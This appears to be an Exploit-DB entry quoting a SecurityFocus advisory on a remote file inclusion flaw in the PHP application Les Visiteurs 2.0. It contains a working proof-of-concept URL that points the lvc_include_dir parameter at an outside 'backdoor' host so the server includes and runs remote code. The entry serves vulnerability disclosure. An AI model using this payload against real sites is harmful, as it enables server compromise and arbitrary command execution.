Les Visiteurs 2.0 - Remote File Inclusion

EDB-ID:

23302




Platform:

PHP

Date:

2003-10-27


source: https://www.securityfocus.com/bid/8902/info

A problem has been reported in the handling of some types of input by Les Visiteurs. Because of this, an attacker may be able to execute arbitrary commands on the system. 

http://www.example.com/path/include/config.inc.php?lvc_include_dir=http://backdoor/